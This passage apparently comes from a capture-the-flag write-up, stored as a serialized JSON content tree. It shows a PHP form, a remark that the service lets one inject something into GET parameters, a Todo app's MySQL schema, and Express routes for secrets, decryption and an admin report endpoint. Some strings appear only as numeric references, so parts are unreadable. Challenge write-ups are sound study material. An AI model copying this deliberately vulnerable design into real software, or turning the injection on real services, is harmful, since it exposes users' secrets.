tool",{"type":33,"tag":128,"props":45728,"children":45729},{"style":300},[45730],{"type":38,"value":6190},{"type":33,"tag":128,"props":45732,"children":45733},{"style":151},[45734],{"type":38,"value":47},{"type":33,"tag":128,"props":45736,"children":45737},{"style":300},[45738],{"type":38,"value":6097},{"type":33,"tag":128,"props":45740,"children":45741},{"class":130,"line":848},[45742,45746,45750,45754,45758,45762,45767,45771,45775,45779,45783,45787,45791],{"type":33,"tag":128,"props":45743,"children":45744},{"style":300},[45745],{"type":38,"value":45666},{"type":33,"tag":128,"props":45747,"children":45748},{"style":151},[45749],{"type":38,"value":14844},{"type":33,"tag":128,"props":45751,"children":45752},{"style":151},[45753],{"type":38,"value":14849},{"type":33,"tag":128,"props":45755,"children":45756},{"style":312},[45757],{"type":38,"value":315},{"type":33,"tag":128,"props":45759,"children":45760},{"style":676},[45761],{"type":38,"value":669},{"type":33,"tag":128,"props":45763,"children":45764},{"style":140},[45765],{"type":38,"value":45766},"index.php",{"type":33,"tag":128,"props":45768,"children":45769},{"style":676},[45770],{"type":38,"value":669},{"type":33,"tag":128,"props":45772,"children":45773},{"style":151},[45774],{"type":38,"value":24416},{"type":33,"tag":128,"props":45776,"children":45777},{"style":312},[45778],{"type":38,"value":315},{"type":33,"tag":128,"props":45780,"children":45781},{"style":676},[45782],{"type":38,"value":669},{"type":33,"tag":128,"props":45784,"children":45785},{"style":140},[45786],{"type":38,"value":13526},{"type":33,"tag":128,"props":45788,"children":45789},{"style":676},[45790],{"type":38,"value":669},{"type":33,"tag":128,"props":45792,"children":45793},{"style":300},[45794],{"type":38,"value":6097},{"type":33,"tag":128,"props":45796,"children":45797},{"class":130,"line":976},[45798,45803,45807,45811,45815,45819,45823,45827,45831,45835,45839,45843,45847],{"type":33,"tag":128,"props":45799,"children":45800},{"style":300},[45801],{"type":38,"value":45802}," \u003C",{"type":33,"tag":128,"props":45804,"children":45805},{"style":151},[45806],{"type":38,"value":14882},{"type":33,"tag":128,"props":45808,"children":45809},{"style":151},[45810],{"type":38,"value":14887},{"type":33,"tag":128,"props":45812,"children":45813},{"style":312},[45814],{"type":38,"value":315},{"type":33,"tag":128,"props":45816,"children":45817},{"style":676},[45818],{"type":38,"value":669},{"type":33,"tag":128,"props":45820,"children":45821},{"style":140},[45822],{"type":38,"value":38},{"type":33,"tag":128,"props":45824,"children":45825},{"style":676},[45826],{"type":38,"value":669},{"type":33,"tag":128,"props":45828,"children":45829},{"style":151},[45830],{"type":38,"value":14688},{"type":33,"tag":128,"props":45832,"children":45833},{"style":312},[45834],{"type":38,"value":315},{"type":33,"tag":128,"props":45836,"children":45837},{"style":676},[45838],{"type":38,"value":669},{"type":33,"tag":128,"props":45840,"children":45841},{"style":140},[45842],{"type":38,"value":5929},{"type":33,"tag":128,"props":45844,"children":45845},{"style":676},[45846],{"type":38,"value":669},{"type":33,"tag":128,"props":45848,"children":45849},{"style":300},[45850],{"type":38,"value":24514},{"type":33,"tag":128,"props":45852,"children":45853},{"class":130,"line":988},[45854,45858,45862,45866,45870,45874,45878,45882,45886,45890,45894,45899,45903],{"type":33,"tag":128,"props":45855,"children":45856},{"style":300},[45857],{"type":38,"value":45802},{"type":33,"tag":128,"props":45859,"children":45860},{"style":151},[45861],{"type":38,"value":14882},{"type":33,"tag":128,"props":45863,"children":45864},{"style":151},[45865],{"type":38,"value":14887},{"type":33,"tag":128,"props":45867,"children":45868},{"style":312},[45869],{"type":38,"value":315},{"type":33,"tag":128,"props":45871,"children":45872},{"style":676},[45873],{"type":38,"value":669},{"type":33,"tag":128,"props":45875,"children":45876},{"style":140},[45877],{"type":38,"value":14977},{"type":33,"tag":128,"props":45879,"children":45880},{"style":676},[45881],{"type":38,"value":669},{"type":33,"tag":128,"props":45883,"children":45884},{"style":151},[45885],{"type":38,"value":13031},{"type":33,"tag":128,"props":45887,"children":45888},{"style":312},[45889],{"type":38,"value":315},{"type":33,"tag":128,"props":45891,"children":45892},{"style":676},[45893],{"type":38,"value":669},{"type":33,"tag":128,"props":45895,"children":45896},{"style":140},[45897],{"type":38,"value":45898},"Submit",{"type":33,"tag":128,"props":45900,"children":45901},{"style":676},[45902],{"type":38,"value":669},{"type":33,"tag":128,"props":45904,"children":45905},{"style":300},[45906],{"type":38,"value":24514},{"type":33,"tag":128,"props":45908,"children":45909},{"class":130,"line":1001},[45910,45915,45919],{"type":33,"tag":128,"props":45911,"children":45912},{"style":300},[45913],{"type":38,"value":45914}," \u003C/",{"type":33,"tag":128,"props":45916,"children":45917},{"style":151},[45918],{"type":38,"value":14844},{"type":33,"tag":128,"props":45920,"children":45921},{"style":300},[45922],{"type":38,"value":6097},{"type":33,"tag":128,"props":45924,"children":45925},{"class":130,"line":1014},[45926,45930,45934,45939,45943],{"type":33,"tag":128,"props":45927,"children":45928},{"style":300},[45929],{"type":38,"value":45529},{"type":33,"tag":128,"props":45931,"children":45932},{"style":151},[45933],{"type":38,"value":40629},{"type":33,"tag":128,"props":45935,"children":45936},{"style":1576},[45937],{"type":38,"value":45938}," endif",{"type":33,"tag":128,"props":45940,"children":45941},{"style":312},[45942],{"type":38,"value":35231},{"type":33,"tag":128,"props":45944,"children":45945},{"style":300},[45946],{"type":38,"value":45585},{"type":33,"tag":128,"props":45948,"children":45949},{"class":130,"line":1026},[45950,45954,45958],{"type":33,"tag":128,"props":45951,"children":45952},{"style":300},[45953],{"type":38,"value":14993},{"type":33,"tag":128,"props":45955,"children":45956},{"style":151},[45957],{"type":38,"value":5671},{"type":33,"tag":128,"props":45959,"children":45960},{"style":300},[45961],{"type":38,"value":6097},{"type":33,"tag":128,"props":45963,"children":45964},{"class":130,"line":1038},[45965,45969,45973],{"type":33,"tag":128,"props":45966,"children":45967},{"style":300},[45968],{"type":38,"value":6190},{"type":33,"tag":128,"props":45970,"children":45971},{"style":151},[45972],{"type":38,"value":5929},{"type":33,"tag":128,"props":45974,"children":45975},{"style":300},[45976],{"type":38,"value":6097},{"type":33,"tag":47,"props":45978,"children":45979},{},[45980,45982,45987,45989,45994],{"type":38,"value":45981},"This is really simple to see that service have a ",{"type":33,"tag":105,"props":45983,"children":45985},{"className":45984},[],[45986],{"type":38,"value":20074},{"type":38,"value":45988}," vulnerability. We can inject a ",{"type":33,"tag":105,"props":45990,"children":45992},{"className":45991},[],[45993],{"type":38,"value":15064},{"type":38,"value":45995}," in GET parameters.",{"type":33,"tag":81,"props":45997,"children":45999},{"id":45998},"todo-app-main-service",[46000],{"type":38,"value":46001},"Todo App (main service)",{"type":33,"tag":47,"props":46003,"children":46004},{},[46005,46007,46012],{"type":38,"value":46006},"The Todo app is a express app with a mysql database. When you have an account you can create a todo and add some content. The content is encrypted with a ",{"type":33,"tag":105,"props":46008,"children":46010},{"className":46009},[],[46011],{"type":38,"value":45455},{"type":38,"value":46013}," that is stored in the database.",{"type":33,"tag":47,"props":46015,"children":46016},{},[46017,46019,46025],{"type":38,"value":46018},"There is definitions of the database in ",{"type":33,"tag":105,"props":46020,"children":46022},{"className":46021},[],[46023],{"type":38,"value":46024},"db.sql",{"type":38,"value":46026}," file:",{"type":33,"tag":114,"props":46028,"children":46029},{"lang":10492},[46030],{"type":33,"tag":119,"props":46031,"children":46033},{"code":46032,"language":10492,"meta":8,"className":41205,"style":8},"CREATE TABLE users (\n id INT NOT NULL AUTO_INCREMENT,\n username VARCHAR(255) NOT NULL,\n password VARCHAR(255) NOT NULL,\n secret VARCHAR(255) NOT NULL,\n PRIMARY KEY (id)\n);\n\nCREATE TABLE todos (\n id INT NOT NULL AUTO_INCREMENT,\n user_id INT NOT NULL,\n data VARCHAR(255) NOT NULL,\n PRIMARY KEY (id),\n FOREIGN KEY (user_id) REFERENCES users(id)\n);\n",[46034],{"type":33,"tag":105,"props":46035,"children":46036},{"__ignoreMap":8},[46037,46059,46082,46116,46149,46181,46194,46201,46208,46228,46247,46267,46299,46311,46334],{"type":33,"tag":128,"props":46038,"children":46039},{"class":130,"line":131},[46040,46045,46050,46055],{"type":33,"tag":128,"props":46041,"children":46042},{"style":1576},[46043],{"type":38,"value":46044},"CREATE",{"type":33,"tag":128,"props":46046,"children":46047},{"style":1576},[46048],{"type":38,"value":46049}," TABLE",{"type":33,"tag":128,"props":46051,"children":46052},{"style":135},[46053],{"type":38,"value":46054}," users",{"type":33,"tag":128,"props":46056,"children":46057},{"style":323},[46058],{"type":38,"value":41261},{"type":33,"tag":128,"props":46060,"children":46061},{"class":130,"line":362},[46062,46067,46072,46077],{"type":33,"tag":128,"props":46063,"children":46064},{"style":323},[46065],{"type":38,"value":46066}," id ",{"type":33,"tag":128,"props":46068,"children":46069},{"style":300},[46070],{"type":38,"value":46071},"INT",{"type":33,"tag":128,"props":46073,"children":46074},{"style":1576},[46075],{"type":38,"value":46076}," NOT NULL",{"type":33,"tag":128,"props":46078,"children":46079},{"style":323},[46080],{"type":38,"value":46081}," AUTO_INCREMENT,\n",{"type":33,"tag":128,"props":46083,"children":46084},{"class":130,"line":403},[46085,46089,46094,46098,46103,46107,46112],{"type":33,"tag":128,"props":46086,"children":46087},{"style":323},[46088],{"type":38,"value":30509},{"type":33,"tag":128,"props":46090,"children":46091},{"style":300},[46092],{"type":38,"value":46093},"VARCHAR",{"type":33,"tag":128,"props":46095,"children":46096},{"style":323},[46097],{"type":38,"value":5566},{"type":33,"tag":128,"props":46099,"children":46100},{"style":523},[46101],{"type":38,"value":46102},"255",{"type":33,"tag":128,"props":46104,"children":46105},{"style":323},[46106],{"type":38,"value":10105},{"type":33,"tag":128,"props":46108,"children":46109},{"style":1576},[46110],{"type":38,"value":46111},"NOT NULL",{"type":33,"tag":128,"props":46113,"children":46114},{"style":323},[46115],{"type":38,"value":693},{"type":33,"tag":128,"props":46117,"children":46118},{"class":130,"line":739},[46119,46124,46129,46133,46137,46141,46145],{"type":33,"tag":128,"props":46120,"children":46121},{"style":1576},[46122],{"type":38,"value":46123}," password",{"type":33,"tag":128,"props":46125,"children":46126},{"style":300},[46127],{"type":38,"value":46128}," VARCHAR",{"type":33,"tag":128,"props":46130,"children":46131},{"style":323},[46132],{"type":38,"value":5566},{"type":33,"tag":128,"props":46134,"children":46135},{"style":523},[46136],{"type":38,"value":46102},{"type":33,"tag":128,"props":46138,"children":46139},{"style":323},[46140],{"type":38,"value":10105},{"type":33,"tag":128,"props":46142,"children":46143},{"style":1576},[46144],{"type":38,"value":46111},{"type":33,"tag":128,"props":46146,"children":46147},{"style":323},[46148],{"type":38,"value":693},{"type":33,"tag":128,"props":46150,"children":46151},{"class":130,"line":765},[46152,46157,46161,46165,46169,46173,46177],{"type":33,"tag":128,"props":46153,"children":46154},{"style":1576},[46155],{"type":38,"value":46156}," secret",{"type":33,"tag":128,"props":46158,"children":46159},{"style":300},[46160],{"type":38,"value":46128},{"type":33,"tag":128,"props":46162,"children":46163},{"style":323},[46164],{"type":38,"value":5566},{"type":33,"tag":128,"props":46166,"children":46167},{"style":523},[46168],{"type":38,"value":46102},{"type":33,"tag":128,"props":46170,"children":46171},{"style":323},[46172],{"type":38,"value":10105},{"type":33,"tag":128,"props":46174,"children":46175},{"style":1576},[46176],{"type":38,"value":46111},{"type":33,"tag":128,"props":46178,"children":46179},{"style":323},[46180],{"type":38,"value":693},{"type":33,"tag":128,"props":46182,"children":46183},{"class":130,"line":804},[46184,46189],{"type":33,"tag":128,"props":46185,"children":46186},{"style":300},[46187],{"type":38,"value":46188}," PRIMARY KEY",{"type":33,"tag":128,"props":46190,"children":46191},{"style":323},[46192],{"type":38,"value":46193}," (id)\n",{"type":33,"tag":128,"props":46195,"children":46196},{"class":130,"line":839},[46197],{"type":33,"tag":128,"props":46198,"children":46199},{"style":323},[46200],{"type":38,"value":5815},{"type":33,"tag":128,"props":46202,"children":46203},{"class":130,"line":848},[46204],{"type":33,"tag":128,"props":46205,"children":46206},{"emptyLinePlaceholder":896},[46207],{"type":38,"value":899},{"type":33,"tag":128,"props":46209,"children":46210},{"class":130,"line":976},[46211,46215,46219,46224],{"type":33,"tag":128,"props":46212,"children":46213},{"style":1576},[46214],{"type":38,"value":46044},{"type":33,"tag":128,"props":46216,"children":46217},{"style":1576},[46218],{"type":38,"value":46049},{"type":33,"tag":128,"props":46220,"children":46221},{"style":135},[46222],{"type":38,"value":46223}," todos",{"type":33,"tag":128,"props":46225,"children":46226},{"style":323},[46227],{"type":38,"value":41261},{"type":33,"tag":128,"props":46229,"children":46230},{"class":130,"line":988},[46231,46235,46239,46243],{"type":33,"tag":128,"props":46232,"children":46233},{"style":323},[46234],{"type":38,"value":46066},{"type":33,"tag":128,"props":46236,"children":46237},{"style":300},[46238],{"type":38,"value":46071},{"type":33,"tag":128,"props":46240,"children":46241},{"style":1576},[46242],{"type":38,"value":46076},{"type":33,"tag":128,"props":46244,"children":46245},{"style":323},[46246],{"type":38,"value":46081},{"type":33,"tag":128,"props":46248,"children":46249},{"class":130,"line":1001},[46250,46255,46259,46263],{"type":33,"tag":128,"props":46251,"children":46252},{"style":323},[46253],{"type":38,"value":46254}," user_id ",{"type":33,"tag":128,"props":46256,"children":46257},{"style":300},[46258],{"type":38,"value":46071},{"type":33,"tag":128,"props":46260,"children":46261},{"style":1576},[46262],{"type":38,"value":46076},{"type":33,"tag":128,"props":46264,"children":46265},{"style":323},[46266],{"type":38,"value":693},{"type":33,"tag":128,"props":46268,"children":46269},{"class":130,"line":1014},[46270,46275,46279,46283,46287,46291,46295],{"type":33,"tag":128,"props":46271,"children":46272},{"style":1576},[46273],{"type":38,"value":46274}," data",{"type":33,"tag":128,"props":46276,"children":46277},{"style":300},[46278],{"type":38,"value":46128},{"type":33,"tag":128,"props":46280,"children":46281},{"style":323},[46282],{"type":38,"value":5566},{"type":33,"tag":128,"props":46284,"children":46285},{"style":523},[46286],{"type":38,"value":46102},{"type":33,"tag":128,"props":46288,"children":46289},{"style":323},[46290],{"type":38,"value":10105},{"type":33,"tag":128,"props":46292,"children":46293},{"style":1576},[46294],{"type":38,"value":46111},{"type":33,"tag":128,"props":46296,"children":46297},{"style":323},[46298],{"type":38,"value":693},{"type":33,"tag":128,"props":46300,"children":46301},{"class":130,"line":1026},[46302,46306],{"type":33,"tag":128,"props":46303,"children":46304},{"style":300},[46305],{"type":38,"value":46188},{"type":33,"tag":128,"props":46307,"children":46308},{"style":323},[46309],{"type":38,"value":46310}," (id),\n",{"type":33,"tag":128,"props":46312,"children":46313},{"class":130,"line":1038},[46314,46319,46324,46329],{"type":33,"tag":128,"props":46315,"children":46316},{"style":300},[46317],{"type":38,"value":46318}," FOREIGN KEY",{"type":33,"tag":128,"props":46320,"children":46321},{"style":323},[46322],{"type":38,"value":46323}," (user_id) ",{"type":33,"tag":128,"props":46325,"children":46326},{"style":300},[46327],{"type":38,"value":46328},"REFERENCES",{"type":33,"tag":128,"props":46330,"children":46331},{"style":323},[46332],{"type":38,"value":46333}," users(id)\n",{"type":33,"tag":128,"props":46335,"children":46336},{"class":130,"line":1051},[46337],{"type":33,"tag":128,"props":46338,"children":46339},{"style":323},[46340],{"type":38,"value":5815},{"type":33,"tag":47,"props":46342,"children":46343},{},[46344],{"type":38,"value":46345},"The todo app have many routes but the most important are:",{"type":33,"tag":114,"props":46347,"children":46349},{":lang:js":46348,"lang:js":8},"true",[46350],{"type":33,"tag":119,"props":46351,"children":46353},{"code":46352,"language":5526,"meta":8,"className":5530,"style":8},"router.get('/secret', async (req, res) => {\n console.log(\"/secret\", req.session.userId)\n const result = await db.getSecret(req.session.userId);\n if (result) {\n return res.status(200).json({ secret: result });\n }\n return res.status(400).json({ error: 'No secret found' });\n});\n\nrouter.post('/decrypt', async (req, res) => {\n if (!req.body.secret) {\n return res.status(400).json({ error: 'Missing secret' });\n }\n\n if (!req.body.cipher) {\n return res.status(400).json({ error: 'Missing cipher' });\n }\n\n try {\n const result = decrypt(req.body.cipher, req.body.secret);\n return res.status(200).json({ decrypted: result });\n } catch (e) {\n return res.status(400).json({ error: 'Invalid key or cipher' });\n }\n});\n\n// Report any suspicious activity to the admin!\nrouter.post('/report', doReportHandler);\n",[46354],{"type":33,"tag":105,"props":46355,"children":46356},{"__ignoreMap":8},[46357,46425,46484,46545,46568,46624,46631,46695,46702,46709,46777,46821,46885,46892,46899,46943,47007,47014,47021,47032,47104,47160,47187,47251,47258,47265,47272,47280],{"type":33,"tag":128,"props":46358,"children":46359},{"class":130,"line":131},[46360,46364,46368,46372,46376,46380,46385,46389,46393,46397,46401,46405,46409,46413,46417,46421],{"type":33,"tag":128,"props":46361,"children":46362},{"style":306},[46363],{"type":38,"value":5552},{"type":33,"tag":128,"props":46365,"children":46366},{"style":312},[46367],{"type":38,"value":215},{"type":33,"tag":128,"props":46369,"children":46370},{"style":135},[46371],{"type":38,"value":13526},{"type":33,"tag":128,"props":46373,"children":46374},{"style":312},[46375],{"type":38,"value":5566},{"type":33,"tag":128,"props":46377,"children":46378},{"style":676},[46379],{"type":38,"value":6040},{"type":33,"tag":128,"props":46381,"children":46382},{"style":140},[46383],{"type":38,"value":46384},"/secret",{"type":33,"tag":128,"props":46386,"children":46387},{"style":676},[46388],{"type":38,"value":6040},{"type":33,"tag":128,"props":46390,"children":46391},{"style":312},[46392],{"type":38,"value":5584},{"type":33,"tag":128,"props":46394,"children":46395},{"style":300},[46396],{"type":38,"value":5598},{"type":33,"tag":128,"props":46398,"children":46399},{"style":312},[46400],{"type":38,"value":2852},{"type":33,"tag":128,"props":46402,"children":46403},{"style":306},[46404],{"type":38,"value":5607},{"type":33,"tag":128,"props":46406,"children":46407},{"style":312},[46408],{"type":38,"value":5584},{"type":33,"tag":128,"props":46410,"children":46411},{"style":306},[46412],{"type":38,"value":5616},{"type":33,"tag":128,"props":46414,"children":46415},{"style":312},[46416],{"type":38,"value":2966},{"type":33,"tag":128,"props":46418,"children":46419},{"style":312},[46420],{"type":38,"value":5625},{"type":33,"tag":128,"props":46422,"children":46423},{"style":312},[46424],{"type":38,"value":762},{"type":33,"tag":128,"props":46426,"children":46427},{"class":130,"line":362},[46428,46432,46436,46440,46444,46448,46452,46456,46460,46464,46468,46472,46476,46480],{"type":33,"tag":128,"props":46429,"children":46430},{"style":306},[46431],{"type":38,"value":6880},{"type":33,"tag":128,"props":46433,"children":46434},{"style":312},[46435],{"type":38,"value":215},{"type":33,"tag":128,"props":46437,"children":46438},{"style":135},[46439],{"type":38,"value":13157},{"type":33,"tag":128,"props":46441,"children":46442},{"style":312},[46443],{"type":38,"value":5566},{"type":33,"tag":128,"props":46445,"children":46446},{"style":676},[46447],{"type":38,"value":669},{"type":33,"tag":128,"props":46449,"children":46450},{"style":140},[46451],{"type":38,"value":46384},{"type":33,"tag":128,"props":46453,"children":46454},{"style":676},[46455],{"type":38,"value":669},{"type":33,"tag":128,"props":46457,"children":46458},{"style":312},[46459],{"type":38,"value":5584},{"type":33,"tag":128,"props":46461,"children":46462},{"style":306},[46463],{"type":38,"value":5662},{"type":33,"tag":128,"props":46465,"children":46466},{"style":312},[46467],{"type":38,"value":215},{"type":33,"tag":128,"props":46469,"children":46470},{"style":306},[46471],{"type":38,"value":6557},{"type":33,"tag":128,"props":46473,"children":46474},{"style":312},[46475],{"type":38,"value":215},{"type":33,"tag":128,"props":46477,"children":46478},{"style":306},[46479],{"type":38,"value":6566},{"type":33,"tag":128,"props":46481,"children":46482},{"style":312},[46483],{"type":38,"value":2427},{"type":33,"tag":128,"props":46485,"children":46486},{"class":130,"line":403},[46487,46491,46495,46499,46503,46508,46512,46517,46521,46525,46529,46533,46537,46541],{"type":33,"tag":128,"props":46488,"children":46489},{"style":300},[46490],{"type":38,"value":5696},{"type":33,"tag":128,"props":46492,"children":46493},{"style":306},[46494],{"type":38,"value":35848},{"type":33,"tag":128,"props":46496,"children":46497},{"style":312},[46498],{"type":38,"value":5657},{"type":33,"tag":128,"props":46500,"children":46501},{"style":1576},[46502],{"type":38,"value":5796},{"type":33,"tag":128,"props":46504,"children":46505},{"style":306},[46506],{"type":38,"value":46507}," db",{"type":33,"tag":128,"props":46509,"children":46510},{"style":312},[46511],{"type":38,"value":215},{"type":33,"tag":128,"props":46513,"children":46514},{"style":135},[46515],{"type":38,"value":46516},"getSecret",{"type":33,"tag":128,"props":46518,"children":46519},{"style":312},[46520],{"type":38,"value":5566},{"type":33,"tag":128,"props":46522,"children":46523},{"style":306},[46524],{"type":38,"value":5607},{"type":33,"tag":128,"props":46526,"children":46527},{"style":312},[46528],{"type":38,"value":215},{"type":33,"tag":128,"props":46530,"children":46531},{"style":306},[46532],{"type":38,"value":6557},{"type":33,"tag":128,"props":46534,"children":46535},{"style":312},[46536],{"type":38,"value":215},{"type":33,"tag":128,"props":46538,"children":46539},{"style":306},[46540],{"type":38,"value":6566},{"type":33,"tag":128,"props":46542,"children":46543},{"style":312},[46544],{"type":38,"value":5815},{"type":33,"tag":128,"props":46546,"children":46547},{"class":130,"line":739},[46548,46552,46556,46560,46564],{"type":33,"tag":128,"props":46549,"children":46550},{"style":1576},[46551],{"type":38,"value":6625},{"type":33,"tag":128,"props":46553,"children":46554},{"style":312},[46555],{"type":38,"value":2852},{"type":33,"tag":128,"props":46557,"children":46558},{"style":306},[46559],{"type":38,"value":35934},{"type":33,"tag":128,"props":46561,"children":46562},{"style":312},[46563],{"type":38,"value":2966},{"type":33,"tag":128,"props":46565,"children":46566},{"style":312},[46567],{"type":38,"value":762},{"type":33,"tag":128,"props":46569,"children":46570},{"class":130,"line":765},[46571,46575,46579,46583,46587,46591,46596,46600,46604,46608,46612,46616,46620],{"type":33,"tag":128,"props":46572,"children":46573},{"style":1576},[46574],{"type":38,"value":13615},{"type":33,"tag":128,"props":46576,"children":46577},{"style":306},[46578],{"type":38,"value":5616},{"type":33,"tag":128,"props":46580,"children":46581},{"style":312},[46582],{"type":38,"value":215},{"type":33,"tag":128,"props":46584,"children":46585},{"style":135},[46586],{"type":38,"value":6686},{"type":33,"tag":128,"props":46588,"children":46589},{"style":312},[46590],{"type":38,"value":5566},{"type":33,"tag":128,"props":46592,"children":46593},{"style":523},[46594],{"type":38,"value":46595},"200",{"type":33,"tag":128,"props":46597,"children":46598},{"style":312},[46599],{"type":38,"value":6700},{"type":33,"tag":128,"props":46601,"children":46602},{"style":135},[46603],{"type":38,"value":633},{"type":33,"tag":128,"props":46605,"children":46606},{"style":312},[46607],{"type":38,"value":5836},{"type":33,"tag":128,"props":46609,"children":46610},{"style":437},[46611],{"type":38,"value":5066},{"type":33,"tag":128,"props":46613,"children":46614},{"style":312},[46615],{"type":38,"value":284},{"type":33,"tag":128,"props":46617,"children":46618},{"style":306},[46619],{"type":38,"value":35848},{"type":33,"tag":128,"props":46621,"children":46622},{"style":312},[46623],{"type":38,"value":5863},{"type":33,"tag":128,"props":46625,"children":46626},{"class":130,"line":804},[46627],{"type":33,"tag":128,"props":46628,"children":46629},{"style":312},[46630],{"type":38,"value":6760},{"type":33,"tag":128,"props":46632,"children":46633},{"class":130,"line":839},[46634,46638,46642,46646,46650,46654,46658,46662,46666,46670,46674,46678,46682,46687,46691],{"type":33,"tag":128,"props":46635,"children":46636},{"style":1576},[46637],{"type":38,"value":6810},{"type":33,"tag":128,"props":46639,"children":46640},{"style":306},[46641],{"type":38,"value":5616},{"type":33,"tag":128,"props":46643,"children":46644},{"style":312},[46645],{"type":38,"value":215},{"type":33,"tag":128,"props":46647,"children":46648},{"style":135},[46649],{"type":38,"value":6686},{"type":33,"tag":128,"props":46651,"children":46652},{"style":312},[46653],{"type":38,"value":5566},{"type":33,"tag":128,"props":46655,"children":46656},{"style":523},[46657],{"type":38,"value":6695},{"type":33,"tag":128,"props":46659,"children":46660},{"style":312},[46661],{"type":38,"value":6700},{"type":33,"tag":128,"props":46663,"children":46664},{"style":135},[46665],{"type":38,"value":633},{"type":33,"tag":128,"props":46667,"children":46668},{"style":312},[46669],{"type":38,"value":5836},{"type":33,"tag":128,"props":46671,"children":46672},{"style":437},[46673],{"type":38,"value":14251},{"type":33,"tag":128,"props":46675,"children":46676},{"style":312},[46677],{"type":38,"value":284},{"type":33,"tag":128,"props":46679,"children":46680},{"style":676},[46681],{"type":38,"value":6739},{"type":33,"tag":128,"props":46683,"children":46684},{"style":140},[46685],{"type":38,"value":46686},"No secret found",{"type":33,"tag":128,"props":46688,"children":46689},{"style":676},[46690],{"type":38,"value":6040},{"type":33,"tag":128,"props":46692,"children":46693},{"style":312},[46694],{"type":38,"value":5863},{"type":33,"tag":128,"props":46696,"children":46697},{"class":130,"line":848},[46698],{"type":33,"tag":128,"props":46699,"children":46700},{"style":312},[46701],{"type":38,"value":5902},{"type":33,"tag":128,"props":46703,"children":46704},{"class":130,"line":976},[46705],{"type":33,"tag":128,"props":46706,"children":46707},{"emptyLinePlaceholder":896},[46708],{"type":38,"value":899},{"type":33,"tag":128,"props":46710,"children":46711},{"class":130,"line":988},[46712,46716,46720,46724,46728,46732,46737,46741,46745,46749,46753,46757,46761,46765,46769,46773],{"type":33,"tag":128,"props":46713,"children":46714},{"style":306},[46715],{"type":38,"value":5552},{"type":33,"tag":128,"props":46717,"children":46718},{"style":312},[46719],{"type":38,"value":215},{"type":33,"tag":128,"props":46721,"children":46722},{"style":135},[46723],{"type":38,"value":5561},{"type":33,"tag":128,"props":46725,"children":46726},{"style":312},[46727],{"type":38,"value":5566},{"type":33,"tag":128,"props":46729,"children":46730},{"style":676},[46731],{"type":38,"value":6040},{"type":33,"tag":128,"props":46733,"children":46734},{"style":140},[46735],{"type":38,"value":46736},"/decrypt",{"type":33,"tag":128,"props":46738,"children":46739},{"style":676},[46740],{"type":38,"value":6040},{"type":33,"tag":128,"props":46742,"children":46743},{"style":312},[46744],{"type":38,"value":5584},{"type":33,"tag":128,"props":46746,"children":46747},{"style":300},[46748],{"type":38,"value":5598},{"type":33,"tag":128,"props":46750,"children":46751},{"style":312},[46752],{"type":38,"value":2852},{"type":33,"tag":128,"props":46754,"children":46755},{"style":306},[46756],{"type":38,"value":5607},{"type":33,"tag":128,"props":46758,"children":46759},{"style":312},[46760],{"type":38,"value":5584},{"type":33,"tag":128,"props":46762,"children":46763},{"style":306},[46764],{"type":38,"value":5616},{"type":33,"tag":128,"props":46766,"children":46767},{"style":312},[46768],{"type":38,"value":2966},{"type":33,"tag":128,"props":46770,"children":46771},{"style":312},[46772],{"type":38,"value":5625},{"type":33,"tag":128,"props":46774,"children":46775},{"style":312},[46776],{"type":38,"value":762},{"type":33,"tag":128,"props":46778,"children":46779},{"class":130,"line":1001},[46780,46784,46788,46792,46796,46800,46804,46808,46813,46817],{"type":33,"tag":128,"props":46781,"children":46782},{"style":1576},[46783],{"type":38,"value":6625},{"type":33,"tag":128,"props":46785,"children":46786},{"style":312},[46787],{"type":38,"value":2852},{"type":33,"tag":128,"props":46789,"children":46790},{"style":300},[46791],{"type":38,"value":16424},{"type":33,"tag":128,"props":46793,"children":46794},{"style":306},[46795],{"type":38,"value":5607},{"type":33,"tag":128,"props":46797,"children":46798},{"style":312},[46799],{"type":38,"value":215},{"type":33,"tag":128,"props":46801,"children":46802},{"style":306},[46803],{"type":38,"value":5671},{"type":33,"tag":128,"props":46805,"children":46806},{"style":312},[46807],{"type":38,"value":215},{"type":33,"tag":128,"props":46809,"children":46810},{"style":306},[46811],{"type":38,"value":46812},"secret",{"type":33,"tag":128,"props":46814,"children":46815},{"style":312},[46816],{"type":38,"value":2966},{"type":33,"tag":128,"props":46818,"children":46819},{"style":312},[46820],{"type":38,"value":762},{"type":33,"tag":128,"props":46822,"children":46823},{"class":130,"line":1014},[46824,46828,46832,46836,46840,46844,46848,46852,46856,46860,46864,46868,46872,46877,46881],{"type":33,"tag":128,"props":46825,"children":46826},{"style":1576},[46827],{"type":38,"value":13615},{"type":33,"tag":128,"props":46829,"children":46830},{"style":306},[46831],{"type":38,"value":5616},{"type":33,"tag":128,"props":46833,"children":46834},{"style":312},[46835],{"type":38,"value":215},{"type":33,"tag":128,"props":46837,"children":46838},{"style":135},[46839],{"type":38,"value":6686},{"type":33,"tag":128,"props":46841,"children":46842},{"style":312},[46843],{"type":38,"value":5566},{"type":33,"tag":128,"props":46845,"children":46846},{"style":523},[46847],{"type":38,"value":6695},{"type":33,"tag":128,"props":46849,"children":46850},{"style":312},[46851],{"type":38,"value":6700},{"type":33,"tag":128,"props":46853,"children":46854},{"style":135},[46855],{"type":38,"value":633},{"type":33,"tag":128,"props":46857,"children":46858},{"style":312},[46859],{"type":38,"value":5836},{"type":33,"tag":128,"props":46861,"children":46862},{"style":437},[46863],{"type":38,"value":14251},{"type":33,"tag":128,"props":46865,"children":46866},{"style":312},[46867],{"type":38,"value":284},{"type":33,"tag":128,"props":46869,"children":46870},{"style":676},[46871],{"type":38,"value":6739},{"type":33,"tag":128,"props":46873,"children":46874},{"style":140},[46875],{"type":38,"value":46876},"Missing secret",{"type":33,"tag":128,"props":46878,"children":46879},{"style":676},[46880],{"type":38,"value":6040},{"type":33,"tag":128,"props":46882,"children":46883},{"style":312},[46884],{"type":38,"value":5863},{"type":33,"tag":128,"props":46886,"children":46887},{"class":130,"line":1026},[46888],{"type":33,"tag":128,"props":46889,"children":46890},{"style":312},[46891],{"type":38,"value":6760},{"type":33,"tag":128,"props":46893,"children":46894},{"class":130,"line":1038},[46895],{"type":33,"tag":128,"props":46896,"children":46897},{"emptyLinePlaceholder":896},[46898],{"type":38,"value":899},{"type":33,"tag":128,"props":46900,"children":46901},{"class":130,"line":1051},[46902,46906,46910,46914,46918,46922,46926,46930,46935,46939],{"type":33,"tag":128,"props":46903,"children":46904},{"style":1576},[46905],{"type":38,"value":6625},{"type":33,"tag":128,"props":46907,"children":46908},{"style":312},[46909],{"type":38,"value":2852},{"type":33,"tag":128,"props":46911,"children":46912},{"style":300},[46913],{"type":38,"value":16424}